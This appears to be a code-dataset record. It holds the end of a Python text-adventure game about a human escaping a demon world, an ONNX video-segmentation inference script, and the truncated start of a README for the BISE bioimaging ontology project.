jewels: \\n\")\r\n\r\n changejewel(30)\r\n\r\n print(\"\\nYou: Thank you all, i shall take off now.\")\r\n print(\"Before you leave the village, you have to drink the potion.\")\r\n input(\"To drink potion press enter: \\n\")\r\n\r\n changepotion(0)\r\n\r\n print(\"\\n--You pack your bag and head toward the capital. On your way you find the potion shop.--\")\r\n ans = input(\"Would you like to buy some potion? y/n: \")\r\n if ans == 'y':\r\n print(\"--You go to the potion shop and ask about the potions.--\")\r\n print(\"Potion Master: Hello, there! What kind of potions would you like to buy?\")\r\n print(\"You: I am not sure. What kind of potions do you have?\")\r\n print(\"Potion Master: I sell 1:(healing potions-10 jewels each) and 2:(invisible potions--5 jewels each).\")\r\n buy = input(\"Select the type of potion you want to buy, if you want to buy both, then type both: \")\r\n if buy == '1':\r\n print(\"Potion Master: How many of the healing potions would you like to buy?\")\r\n num = input(\"Enter the number potions you want: \")\r\n money = 10*int(num)\r\n print(\"Potion Master: For \" + str(num) + \" healing potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n\r\n print(\"\\n And take you potions.\\n\")\r\n changepotion(int(num))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n elif buy == '2':\r\n print(\"Potion Master: How many of the invisible potions would you like to buy?\")\r\n num = input(\"Enter the number potions you want: \")\r\n money = 5*int(num)\r\n print(\"Potion Master: For \" + str(num) + \" invisible potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n\r\n print(\"\\n And take you potions.\\n\")\r\n changepotion(int(num))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n elif buy == 'both':\r\n print(\"Potion Master: How many of the healing potions would you like to buy?\")\r\n num1 = input(\"Enter the number potions you want: \")\r\n print(\"Potion Master: How many of the invisible potions would you like to buy?\")\r\n num2 = input(\"Enter the number potions you want: \")\r\n money = (10*int(num1)) + (5*int(num2))\r\n print(\"Potion Master: For\" + str(num1) + \"healing potions and \" + str(num2) + \"invisible potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n print(\"\\n And take you potions.\\n\")\r\n\r\n changepotion(int(num1) + int(num2))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n else:\r\n print(\"--You continue to head to the capital.--\");\r\n\r\n\r\n#when option 2 is chosen\r\nelif val == '2':\r\n print(\"You: Thank you for you kindness but I think I will be able to travel on my own now.\")\r\n print(\"Villager: Alright, then take this potion. Drink it, this will hide your presence from evil demons.\")\r\n print(\"You: Thank you, i will accept the potion.\\n\")\r\n\r\n changepotion(1)\r\n\r\n input(\"\\nPress enter to continue!\")\r\n print(\"--You part with the villager and start to wonder around this big forest.--\")\r\n print(\"--You search for a way out of this forest and for food supply.--\")\r\n print(\"--Suddenly, you see apples lying on the ground; you look above and see a lot of big apple trees.--\")\r\n print(\"--You eat some apples to ease your hunger and pick 10 apples for your journey.--\")\r\n input(\"To pick 10 apples type 'pick apples': \")\r\n\r\n changeapple(10)\r\n\r\n print(\"\\n--After you secured the food, you continue to move forward. An abrupt howling sound!--\")\r\n print(\"--The frightening roar of a beast made you cautious. You have to run or kill it, if you want to live.--\")\r\n print(\"--The ground started to shake and a huge boar like creature is running toward you.--\\n\")\r\n\r\n print(\"+++++++++++++++++++++\")\r\n print(\" |\\______/| \")\r\n print(\" ({+} {+})\")\r\n print(\" ( \\ |-| / \")\r\n print(\" / (=======) \")\r\n print(\" ( VVVVVVV \")\r\n print(\" | ^^^^^^^ \")\r\n print(\"+++++++++++++++++++++\")\r\n\r\n print(\"\\n--The beast is closing in, almost hitting you.--\")\r\n print(\"--You dodge the hit, move back and start running.--\")\r\n print(\"--The beast chases you at the end of the forest and tries to attack you again.--\")\r\n print(\"--You grab the stones from the ground and hit the beast before it attacks you.--\")\r\n print(\"--You constantly keep hitting it hard and after a while the beast fell down.--\")\r\n print(\"--As you are relieved, the beast's body shattered into a spear.--\")\r\n print(\"--You are shocked by this transformation and slowly approach the shattered body.--\")\r\n print(\"--You check if it is safe, take the spear with you and move out of the forest.--\\n\")\r\n\r\n input(\"Press enter to continue: \")\r\n print(\"--You walk to nearby village across a river and a giant serpent attacks you from behind.--\")\r\n print(\"--You see some of the villagers screaming with fear and you look back to see the vicious serpent.--\\n\")\r\n\r\n print(\"\\n///////////////////////\")\r\n print(\"//___// \")\r\n print(\" / + \\ \")\r\n print(\" \\= \\_ \")\r\n print(\" | * \\_ |\")\r\n print(\" \\ * \\ / |\")\r\n print(\" \\ * \\ / /\")\r\n print(\"/////////////////////////\\n\")\r\n\r\n print(\"\\n--You are hit by the serpent and lose all you energy.--\")\r\n print(\"To regain all your stamina, you can eat 3 apples.\")\r\n input(\"To eat 3 apple write (3 apples): \\n\" )\r\n\r\n changeapple(7)\r\n\r\n print(\"\\n++++++++++++++++++++\")\r\n print(\" Full recovery \")\r\n print(\"+++++++++++++++++++++\")\r\n print(\"--You run forward to pierce the serpent with your spear. The spear kills off the serpent in one hit.--\")\r\n print(\"________________\")\r\n print(\" Pierce \")\r\n print(\"________________\")\r\n print(\"--You hear screams as the blood is spilling out of the serpent.--\")\r\n print(\"*After slaughtering serpent*\")\r\n print(\"(Villagers screaming with excitement)\")\r\n print(\"Villager 1: you are the human from before! Thank you very much.\")\r\n print(\"Villager 2: You are our hero! You saved us from the giant water serpent!\")\r\n print(\"Village chief: You have done so much for us kind stranger. Please accept a small reward from us:here is your 30 jewels.\")\r\n input(\"Type 'accept' to accept the jewels: \\n\")\r\n\r\n changejewel(30)\r\n\r\n print(\"\\nVillager: If you want to go back where you came from, then you should go to the capital centre.\")\r\n print(\"You: Where is the capital? How can i go there?\")\r\n print(\"Villager: Now you are in the East village. If you head to the West from here, you will reach the capital.\")\r\n print(\"You: Thank you all, i shall take off now.\")\r\n print(\"Before you leave the village, you have to drink the potion.\")\r\n input(\"To drink potion press enter: \\n\")\r\n\r\n changepotion(0)\r\n\r\n print(\"\\n--You pack your bag and head toward the capital. On your way you find the potion shop.--\")\r\n ans = input(\"Would you like to buy some potion? y/n: \")\r\n if ans == 'y':\r\n print(\"--You go to the potion shop and ask about the potions.--\")\r\n print(\"Potion Master: Hello, there! What kind of potions would you like to buy?\")\r\n print(\"You: I am not sure. What kind of potions do you have?\")\r\n print(\"Potion Master: I sell 1:(healing potions-10 jewels each) and 2:(invisible potions--5 jewels each).\")\r\n buy = input(\"Select the type of potion you want to buy, if you want to buy both, then type both: \")\r\n if buy == '1':\r\n print(\"Potion Master: How many of the healing potions would you like to buy?\")\r\n num = input(\"Enter the number potions you want: \")\r\n money = 10*int(num)\r\n print(\"Potion Master: For \" + str(num) + \" healing potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n\r\n print(\"\\n And take you potions.\\n\")\r\n changepotion(int(num))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n elif buy == '2':\r\n print(\"Potion Master: How many of the invisible potions would you like to buy?\")\r\n num = input(\"Enter the number potions you want: \")\r\n money = 5*int(num)\r\n print(\"Potion Master: For \" + str(num) + \" invisible potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n\r\n print(\"\\n And take you potions.\\n\")\r\n changepotion(int(num))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n elif buy == 'both':\r\n print(\"Potion Master: How many of the healing potions would you like to buy?\")\r\n num1 = input(\"Enter the number potions you want: \")\r\n print(\"Potion Master: How many of the invisible potions would you like to buy?\")\r\n num2 = input(\"Enter the number potions you want: \")\r\n money = (10*int(num1)) + (5*int(num2))\r\n print(\"Potion Master: For\" + str(num1) + \"healing potions and \" + str(num2) + \"invisible potions, your total is \" + str(money) + \" jewels.\")\r\n print(\"You pay the potion master.\\n\")\r\n\r\n changejewel(30-money)\r\n print(\"\\n And take you potions.\\n\")\r\n\r\n changepotion(int(num1) + int(num2))\r\n\r\n print(\"\\nPotion Master: Thank you for coming. Come again if you need any potions.\")\r\n print(\"You: Thank you.\")\r\n else:\r\n print(\"--You continue to head to the capital.--\");\r\n\r\n\r\n\r\n#level 2\r\nprint(\"\\n===================\")\r\nprint(\" Level 2 \")\r\nprint(\"===================\")\r\nprint(\"--While you are walking through this stangely different environment, you realized that you are far away from home.--\")\r\nprint(\"--The trees, plants and the landscape, all are very different. You are heading to the West to the Capital by foot.--\")\r\nprint(\"--As you walk, you see a sign board that says: 'Bubun village'--\")\r\nprint(\"+ + + + + + + + + + + + + + + + + + + + + + + + \")\r\nprint(\"_______________-----------------------=======----------)\")\r\nprint(\"| $$ **** $$ |____| |____\")\r\nprint(\"(east || |||| Bubun |+| |+| |__}\")\r\nprint(\"{village ============||====Village===||=========== $$$ Capital |________)\")\r\nprint(\"( || -+-+-+-+- *****\\/++++ __}_\")\r\nprint(\"( ++++ $$ || -=-=-=- ____|||||_|_||||__________}\")\r\nprint(\"( |||| || ***++ )___|\")\r\nprint(\"----------------_______||||___$$______|\")\r\nprint(\"+ + + + + + + + + + + + + + + + + + + + + + + + \\n\")\r\nprint(\"--Now you have entered the Bubun village, it seems full of beautiful greenery and flowers.--\")\r\nprint(\"--As you continue to move inside the village, all you see are dead withered plants and lifeless grounds.--\")\r\nprint(\"--You see two demons having a conversation. You approach them and overhear...--\")\r\nprint(\"Worker 1: This is just impossible! We try so hard to grow plants for making potion but they all wither! Damn that cursed demon!\")\r\nprint(\"Worker 2: If this continues the demon world is soon to end. Aren't the capital aware of that cursed demon. They should be sending someone who can bring that red lotus...\")\r\n\r\nprint(\"\\nYou: Sorry to interrupt. Could you tell me why the surrounding here seems withered?\")\r\nprint(\"Worker 1: Don't you know! It's the cursed demon's rampage! everything she touches, dies!\")\r\nprint(\"Worker 2: She was actually a worker here who unknowingly drunk her own experimented potion that went wrong. We need someone who can go to the pixis' den to get the red lotus. it's the only way to save her and this world.\")\r\nprint(\"You: What is the red lotus for?\")\r\nprint(\"-----------------------\")\r\nprint(\" (\\/\\/) \")\r\nprint(\" (\\/\\/\\/\\/) \")\r\nprint(\" (\\/\\/\\/\\/\\/) \")\r\nprint(\" (\\/\\/\\/\\/\\/\\/) \")\r\nprint(\" (\\/\\/\\/\\/\\/\\/\\/) \")\r\nprint(\" ( ******** ) \")\r\nprint(\" (___________) \")\r\nprint(\"-----------------------\")\r\nprint(\"Worker 1: We finally found that the smell of that flower can reverse the curse.\")\r\nprint(\"--You feel sorry for these demons.--\")\r\nprint(\"You: I'll go! I will help you. Where is the pixis' den?\")\r\nprint(\"Worker 1: Really! You can do it!\")\r\nprint(\"Worker 2: You walk straight on this path and it will lead you to the Wind forest. As you walk inside, there on the left side you will see the pixis' den.\")\r\nprint(\"You: I'll try my best.\")\r\nprint(\"Worker 2: The pixis are vicious creatures, but we have no choice. Here are 5 sleeping potions. Make sure the vapour of the potions spreads thoroughly without you inhaling it. Good luck!\")\r\ninput(\"To accept 5 sleeping potions type 'take': \\n\")\r\n\r\nchangepotion(amount[2]+5)\r\n\r\ninput(\"\\nPress enter to continue: \")\r\nprint(\"--You started to walk straight ahead on this path. After minutes of walk you see the forest.--\")\r\nprint(\"--You feel tired and hungry after all this walk. So you take a break and eat 3 apples.--\")\r\ninput(\"To eat 3 apples type 'eat': \\n\")\r\n\r\nchangeapple(4)\r\n\r\nprint(\"\\n--You walk inside the forest and keep walking, while looking on your left to find the pixis' den.--\")\r\nprint(\"--After walking for several minutes, you find the pixis' den.--\")\r\nprint(\"++++++=++++++++++++++========+++++++++++++++=========+++++++++++\")\r\nprint(\" ++++++++++++++++++++++++\")\r\nprint(\" +++++++ {^^^^^^^^^^^^^^^^^} \")\r\nprint(\" **************** __( )\")\r\nprint(\" | | | | | | | ========= ( pixis' den )\")\r\nprint(\" | | | | | | | | | | | __( )\")\r\nprint(\" | | | | | | | | | | | ^^^( ******* )___\")\r\nprint(\" | | | | | | | | | | | /\\/\\/\\( */\\/\\/\\/\\/\\/\\/\\/\\)\")\r\nprint(\"++++++=++++++++++++++========+++++++++++++++=========+++++++++++\")\r\nprint(\"--Finally, you found it. You slowly cover your nose and take out one of the sleeping potions.--\")\r\ninput(\"To use one sleeping potion write 'use': \\n\")\r\n\r\nchangepotion(amount[2]-1)\r\n\r\nprint(\"\\n--You use the sleeping potion on the pixis at the entrance and they fall asleep.--\")\r\nprint(\"--You carefully walk across the entrance and look for the red lotus, but few pixis comes out from the inside.--\")\r\nprint(\"--Pixis fiercely attack you with their stink. You have to hurry and make a decision.--\")\r\nfight = ['attack', 'dodge']\r\nprint(fight)\r\nchoice = input(\"Enter 'attack' to kill or 'dodge' to avoid: \")\r\nif choice == 'attack':\r\n print(\"--You attack the pixis with your weapon and deflect their attack. The next attack hits them all.--\")\r\n print(\"--You killed the attacking pixis.--\")\r\n print(\"--Now, You decide to go far inside the den to search for the red lotus.--\")\r\nelif choice == 'dodge':\r\n print(\"--You dodge the attacking pixis and use another sleeping potion.--\")\r\n input(\"To use another sleeping potion write 'use': \\n\")\r\n\r\n changepotion(amount[2]-1)\r\n print(\"\\n--The pixis fell on the ground and started to sleep.--\")\r\n print(\"--Now, You decide to go far inside the den to search for the red lotus.--\")\r\n\r\nprint(\"--As you walk inside in stealth motion, you see a large number of pixis surrounding a corner.--\")\r\nprint(\"--Therefore, you decide to use another sleeping potion.--\")\r\ninput(\"To use another sleeping potion write 'use': \\n\")\r\n\r\nchangepotion(amount[2]-1)\r\n\r\nprint(\"\\n--All the pixis have fallen asleep and you see the red lotus in a corner.--\")\r\ninput(\"To pluck the red lotus write 'pluck': \")\r\nprint(\"--You carefully plucked the red lotus and quickly get out of the pixis' den.--\")\r\nprint(\"--You walk out of the forest to meet the workers from before.--\\n\")\r\n\r\nprint(\"--You went back and saw one of the workers standing there.--\")\r\nprint(\"You: Hello Sir, i have come back with the red lotus from the pixis' den.\")\r\nprint(\"Worker 2: You have finally come back. At long last this curse will be broken.\")\r\nprint(\"--You give the red lotus to the worker. The workers made a potion for you to use on the cursed demon.--\")\r\nprint(\"Worker 1: Please take this red lotus potion and splash it on the cursed demon, who resides on the barren ground.\")\r\nprint(\"--You take the potion and follow the workers to the barren ground.--\")\r\nchangepotion(amount[2]+1)\r\nprint(\"--You all see the cursed demon sitting on the barren ground withering all around her.--\")\r\nprint(\"--You approach the demon slowly and take out the red lotus potion.--\")\r\ninput(\"To pour the lotus potion on the cursed demon write 'splash': \\n\")\r\n\r\nchangepotion(amount[2]-1)\r\n\r\nprint(\"\\n--After you splashed the potion, the cursed demon screeched and fainted.--\")\r\nprint(\"--Few seconds later, the curse is lifted, the demon is back to normal and the lands are turning green.--\")\r\nprint(\"++++++++++++++++++++++++++\")\r\nprint(\" * * * * * * * \")\r\nprint(\" ++ ++ ++ ++ ++ ++ ++ ++ \")\r\nprint(\" || || || || || || || ||\")\r\nprint(\"++++++++++++++++++++++++++\")\r\ninput(\"Press enter to continue: \")\r\nprint(\"*The workers shouts with joy*\")\r\nprint(\"--The workers are happy and they want to offer 10 jewels and 5 sleeping potions for saving their friend.--\")\r\ninput(\"To accept 15 jewels and 1 sleeping potions write 'accept': \\n\")\r\n\r\nchangejewel(amount[1]+15)\r\nchangepotion(amount[2]+1)\r\n\r\nprint(\"Cured demon: Thank you for helping me. I want you to take this magic stone. it will help you in your journey.\")\r\nprint(\"You: Thank you. I will accept.\")\r\nprint(\"Workers: Thank you very much. Have a safe journey.\")\r\nprint(\"--You thanked everyone and head out of the Bubun village to the Capital.--\")\r\ninput(\"Press enter to continue: \")\r\n\r\n#level 3\r\nprint(\"\\n===================\")\r\nprint(\" Level 3 \")\r\nprint(\"===================\")\r\nprint(\"+ + + + + + + + + + + + + + + + + + + + + + + + \")\r\nprint(\"_______________-----------------------=======----------)\")\r\nprint(\"| $$ **** $$ |____| |____\")\r\nprint(\"(east || |||| Bubun |+| |+| |__}\")\r\nprint(\"{village ============||====Village===||=========== $$$ Capital |________)\")\r\nprint(\"( || -+-+-+-+- *****\\/++++ __}_\")\r\nprint(\"( ++++ $$ || -=-=-=- ____|||||_|_||||__________}\")\r\nprint(\"( |||| || ***++ )___|\")\r\nprint(\"----------------_______||||___$$______|\")\r\nprint(\"+ + + + + + + + + + + + + + + + + + + + + + + + \\n\")\r\nprint(\"--You continue on your journey to the Capital, so you can go back home.--\")\r\nprint(\"--After a little walk, you pass by a cart on your way.--\")\r\nprint(\"--The cart driver approach you.--\")\r\nprint(\"Cart driver: Would like a ride in my cart? I am going to the capital. 15 jewels each.\")\r\nprint(\"You: Sure, Thank you.\")\r\ninput(\"To pay for your ride write '15 jewels': \")\r\n\r\nchangejewel(amount[1]-15)\r\n\r\nprint(\"\\n--You get inside the cart and have a seat. You also notice that there are a few other passenger.--\")\r\nprint(\"--The cart starts to move and head to the capital.--\")\r\nprint(\"--Many hours gone by, you feel confused about why this is taking a long time?--\")\r\nprint(\"--A sudden halt, the cart stopped moving. You thought you have reached the Capital.--\")\r\nprint(\"--But to your surprise, you look outside to see that it has stopped in an unfamiliar shady forest.--\")\r\nprint(\"--All on a sudden, a group of bandits rush toward the cart and shouting.--\")\r\nprint(\"--Before you can speak, they use sleeping potions.--\")\r\nprint(\"--Immediately you fall in deep slumber!--\")\r\n\r\nprint(\"\\n===================\")\r\nprint(\" unconcious \")\r\nprint(\"===================\")\r\n\r\ninput(\"\\Press enter to continue:\")\r\nprint(\"--Chaotic sound wakes you up. The bright daylight clears your vision. You realise that you have been kidnapped.--\")\r\nprint(\"--You look around to see that other passenger are also tight like you: with price tags on all your foreheads.--\")\r\nprint(\"--A day seem to have passed. You have been brought here by the bandits to be sold in the black-market.--\")\r\nprint(\"--You sit there helplessly on that slave sale auction.--\")\r\nprint(\"--You could not understand what to do, you are scared to be sold out like some other demons.--\")\r\nprint(\"--Anxious hours pass by and fortunately you are safe for a brief moment.--\")\r\nprint(\"--Night falls.--\")\r\nprint(\"--The auction ended for today and you are taken to the store chamber with some other demons.--\")\r\nprint(\"--Everyone seems to have fallen asleep.--\")\r\nprint(\"--You struggle to untie yourself and check your bag.--\")\r\nchangejewel(0)\r\n\r\nprint(\"\\n--You find no jewel in your bag; all the jewels are stolen.--\")\r\nprint(\"You can plan to escape this place or go to sleep hoping you will be saved soon.\")\r\ndecide = input(\"Enter 1:(to try to escape) or 2:(to sleep here for the night): \")\r\nif decide == '1':\r\n print(\"\\n--You wonder around to look for the keys of this chamber.--\")\r\n print(\"--You look here and there, but still can't find it. Your sight gets caught on a small hole on the wall.--\")\r\n print(\"--You put your hand inside and you can feel a breeze. You look inside and see something shiny.--\")\r\n print(\"--You take out the shiny object and it turns out to be a key.--\")\r\n print(\"--You use this key to open the door and it opens.--\")\r\n print(\"--Misfortune does not seem to leave you. the guards see you open the door.--\")\r\n print(\"--Before you can escape they hit you and you pass out.--\")\r\nelif decide == '2':\r\n print(\"\\n--You hold onto your bag and look for a blanket.--\")\r\n print(\"--You find a warm blanket and cover yourself to sleep.--\")\r\n\r\ninput(\"\\nPress enter to continue: \")\r\nprint(\"--You wake up the next morning and hear loud noises.--\")\r\nprint(\"--There seem to be some security officials who found out about this black-market sale.--\")\r\nprint(\"--Now, they are here to take everything in their custody.--\")\r\nprint(\"--You along with other demons are chained up and taken to another official cart, which head to the capital.--\")\r\ninput(\"Press enter to continue: \")\r\n\r\nprint(\"\\n--The cart stops after few hours and you are brought inside the king's palace.--\")\r\nprint(\"Adviser: Sire! I can’t believe this! A human!\")\r\nprint(\"King: What! Such hindrance! How dear you trespass our world!\")\r\nprint(\"--You are frozen with fear thinking what would happen to you now. Will you ever be able to go back?--\")\r\nprint(\"You: But I… I don’t know anything….\")\r\nprint(\"King: I hereby declare this imposter’s execution! Take this creature away!\")\r\nprint(\"--The guards try to take you away.--\")\r\nprint(\"You: Wait no!\")\r\nprint(\"Do you want to try to escape or convince the King of your innocence?\")\r\ngo = input(\"Choose 1:(try to escape) or 2:(try to convince): \")\r\n\r\nif go == '1':\r\n print(\"\\nYou need to regain your energy in order to escape.\")\r\n input(\"Write 'eat' to eat 3 apples to regain your energy: \")\r\n changeapple(amount[0]-3)\r\n print(\"--You regain your energy and push the guards to escape.--\")\r\n print(\"--You run toward the exit and stumble upon a demon knight.--\")\r\n print(\"--The magic stone falls out of the bag and touches you.--\")\r\n print(\"--A projection of all your doings are emitted by the stone.--\")\r\nelif go == '2':\r\n print(\"\\nYou need to regain your energy in order to convince.\")\r\n input(\"Write 'eat' to eat 3 apples to regain your energy: \")\r\n changeapple(amount[0]-3)\r\n print(\"You: I didn’t do anything to harm anybody! Do you have any proof of me being guilty! Just because I’m a different being doesn’t mean I’m a culprit! What kind of law is this!\")\r\n print(\"Demon knight: Sire, we found this magic stone in it’s attire. This can give us a true answer.\")\r\n print(\"--The stone touches you and a projection of all your doings are emitted by the stone.--\")\r\n\r\ninput(\"\\nPress enter to continue: \")\r\nprint(\"Adviser: The human doesn’t seem to be harmful.\")\r\nprint(\"Demon knight: Sire! This human completed the tasks that we couldn’t fulfill. The water serpent and that cursed demon!\")\r\nprint(\"King: We humbly apologise to you human. What would you like to receive as you reward?\")\r\nprint(\"You: I want to go back to my world.\")\r\nprint(\"--The king gladly agrees to grant your wish and escorts you to the Magic Council.--\")\r\nprint(\"Magic magistrate: We ask for your forgiveness, humble human.\")\r\nprint(\"--You accept their apology and they happily prepare for your journey home.--\")\r\nprint(\"--Everyone gathers around as the teleportation circle opens.--\")\r\nprint(\"King: I ask you, human. Do you wish to erase your memory of this world?\")\r\nques = input(\"Enter 1:(no) or 2:(yes):- \")\r\n\r\nif ques == '1':\r\n print(\"\\n--You show your gratitude for all their help, say goodbye to everyone and enter the magic circle.--\")\r\n print(\"--------------------\")\r\n print(\" / / / / / / /\")\r\n print(\" \\ \\ \\ \\ \\ \\ \\/\")\r\n print(\" / / / / / / /\")\r\n print(\"--------------------\")\r\n print(\"--You wake up remembering your great adventure and with some knowledge you gained you start your ordinary life.--\")\r\nelif ques == '2':\r\n print(\"\\n--You show your gratitude for all their help, say goodbye to everyone and enter the magic circle.--\")\r\n print(\"--------------------\")\r\n print(\" / / / / / / /\")\r\n print(\" \\ \\ \\ \\ \\ \\ \\/\")\r\n print(\" / / / / / / /\")\r\n print(\"--------------------\")\r\n print(\"--You wake up from your strange adventurous dream yet you feel like you have learned something and with some knowledge you gained you start your ordinary life.--\\n\")\r\n\r\nprint(\"\\n------------------\")\r\nprint(\"- End game! -\")\r\nprint(\"------------------\\n\")\r\n\r\nplay = input (\"Press any key to exit! :)\")\r\n" } ]
2
LeeYalin/onnx
https://github.com/LeeYalin/onnx
3eac66f06058bb92c038616507867f0b0e519d37
6d62f0dfaedd4b11483d0ed2477a54869da6f8b9
cc22c2275eb80840270b1fdfa5c16f2e1aa6e518
refs/heads/main
2023-03-05T09:28:17.171918
2021-02-20T06:56:58
2021-02-20T06:56:58
340,585,218
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5626623630523682, "alphanum_fraction": 0.6113636493682861, "avg_line_length": 28.902912139892578, "blob_id": "802b8be548aecae7885c3d757395627e9ff40475", "content_id": "9e0bafb7add86645de0ad4616c8f74c1dc03d8fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3180, "license_type": "no_license", "max_line_length": 114, "num_lines": 103, "path": "/opencvAndonnxruntime.py", "repo_name": "LeeYalin/onnx", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\nimport onnxruntime as xr\n\nimport sys\n#reload(sys)\n#sys.setdefaultxxxx(\"utf8\")\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nimport os\nimport cv2\nimport numpy as np\nfrom easydict import EasyDict as edict\nfrom yaml import load\n\nonnxruntime = True\nopencv_use = False\n\nmodel_name = 'v3.onnx'\n######## onnxruntime 调用 ###########\nif onnxruntime:\n sess = xr.InferenceSession(model_name)#加载模型 model_best_two_auxiliary_losses\n \n input_name0 = sess.get_inputs()[0].name#获取输入层的名字,如果有多个输入,需要按照顺序都获取到\n model = sess.get_modelmeta()\n \n######## opencv调用 #########\nif opencv_use:\n net = cv2.dnn.readNetFromONNX(model_name)\n\n\n\n\n\n\n\nvideofile = 'VID_20210112_174111.mp4'\n\nvideoCapture = cv2.VideoCapture(videofile)\n#size = ((int(videoCapture.get(cv2.CAP_PROP_FRAME_WIDTH))+20)*3, int(videoCapture.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n#videoWriter = cv2.VideoWriter('kk_result.mp4', cv2.VideoWriter_fourcc(*'MJPG'), 20, size)\n\nsucc, img = videoCapture.read()\ncnt = 1\nwhile succ:\n h, w, _ = img.shape\n #cv2.imwrite(\"7777777777.png\", img)\n img = cv2.copyMakeBorder(img,0,0,82,82,cv2.BORDER_CONSTANT,value=[0,0,0])\n img = cv2.resize(img, (288, 384))\n img_f = img - (103.94, 116.78, 123.68)\n \n img_f = img_f*0.017\n \n show_image = np.uint8(img/np.max(img)*255)\n cv2.imshow('1', show_image)\n #cv2.waitKey(0)\n # show_image = cv2.cvtColor(show_image, cv2.COLOR_GRAY2BGR)\n # cv2.imshow('img',np.uint8(img/np.max(img)*255))\n \n img_f = np.array(img_f)\n img_f = np.array(np.float32(img_f))\n img_f = np.expand_dims(img_f, 0)\n \n #output_names为输出层名字,需要事先被确认好\n \n img_f = img_f.transpose(0, 3, 1, 2) # kang\n \n ######## opencv infer #########\n if opencv_use:\n start = cv2.getTickCount()\n #blob = cv2.dnn.blobFromImage(img_f, size=(388, 284), crop=False)\n # Run a model\n net.setInput(img_f)\n out = net.forward()\n out = list(out)\n mask_cv = np.argmax(out, 1).squeeze().astype(np.int8)\n end = cv2.getTickCount()\n time = (end - start) / cv2.getTickFrequency()\n print(\"opencv time is: \" + str(time) + \"s\")\n cv2.imshow('mask_cv', np.uint8(mask_cv*255))\n ######## onnxruntime infer ###########\n if onnxruntime:\n start = cv2.getTickCount()\n # res = sess.run(output_names = [\"Concat__87\"],input_feed = {input_name0:img})\n res = sess.run(output_names = [\"output1\"],input_feed = {input_name0:img_f})\n # mask = np.argmax(ort_outs[0], 1).squeeze().astype(np.int8)\n mask = np.argmax(res[0], 1).squeeze().astype(np.int8)\n #cv2.imwrite(\"result.jpg\",mask*255)\n end = cv2.getTickCount()\n time = (end - start) / cv2.getTickFrequency()\n print(\"onnxruntime time is: \" + str(time) + \"s\")\n cv2.imshow('mask_onnx', np.uint8(mask*255))\n \n cv2.waitKey(1)\n succ, img = videoCapture.read()\n cnt += 1\n#end = cv2.getTickCount()\n#time = (end - start) / cv2.getTickFrequency()\n#fps = cnt/time\n#print(\"fps is: \" + str(fps) + \"s\")\n" } ]
1
NEUBIAS/bise-core-ontology
https://github.com/NEUBIAS/bise-core-ontology
3331af3810dbce2812b04120a92be70cbc4c3b7c
99363e003db49deb5e3dd7be64da8edc0a448eaa
ba7d01c19ef4bf42a66de70cba96b9d32f67f4f0
refs/heads/master
2023-03-06T09:28:55.513435
2023-03-02T14:02:59
2023-03-02T14:02:59
76,645,241
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.7542828917503357, "alphanum_fraction": 0.768477737903595, "avg_line_length": 39.05882263183594, "blob_id": "392c9b33aee7d7b0f0c8ffeebf017d20b0b9c4ab", "content_id": "61bf8f5a6d9bc6db6f570958e10d67c92733511c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2045, "license_type": "no_license", "max_line_length": 196, "num_lines": 51, "path": "/README.md", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "# Bise Core Ontology\n\nThis repository hosts the core ontology of the BISE BioImaging Search Engine. \nLatest data dump is available from the bio.tools git hub: https://raw.githubusercontent.com/bio-tools/content/master/datasets/bise-ontology-biii-dump.ttl\n\n## Ontology development process \n1. Web protégé (online web editor) : https://webprotege.stanford.edu/#projects/38b3da5d-b5ce-4d59-972c-23fcb700256a \n2. Export to an OWL file\n3. Documentation generation (LODE) : \n - http://vowl.visualdataweb.org/webvowl-old/webvowl-old.html#iri=https://raw.githubusercontent.com/NeuBIAS/bise-core-ontology/master/owl-ontology/bise-core-ontology-v1.1.owl\n - (broken link) http://www.essepuntato.it/lode/owlapi/https://raw.githubusercontent.com/NeuBIAS/neubias-data-model/master/owl-ontology/bise-core-ontology-v1.1.owl\n\n# Demo queries\n[demo-queries.md](demo-queries.md)\n\n# Demo notebooks \n - Example of advanced ontology-based queries : [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/NeuBIAS/bise-core-ontology/master?filepath=advanced-queries-demo.ipynb)\n - Quality-oriented queries : [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/NeuBIAS/bise-core-ontology/master?filepath=quality-curation-queries.ipynb)\n - Authors network visualisation query: [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/NeuBIAS/bise-core-ontology/master?filepath=network-visualization-queries.ipynb)\n\n### Getting python dependencies\nWith Conda :\n```\nconda create --name bise-ld-webapp\nsource activate bise-ld-webapp\nconda install rdflib jupyter -c conda-forge\n```\nOr with pip :\n```\npip install rdflib\npip install jupyter\n```\n### Launching the notebook\n```\njupyter-notebook\n```\n\n \n# Demo web app\n### Virtual environment setup to get python dependencies\n```\nconda create --name 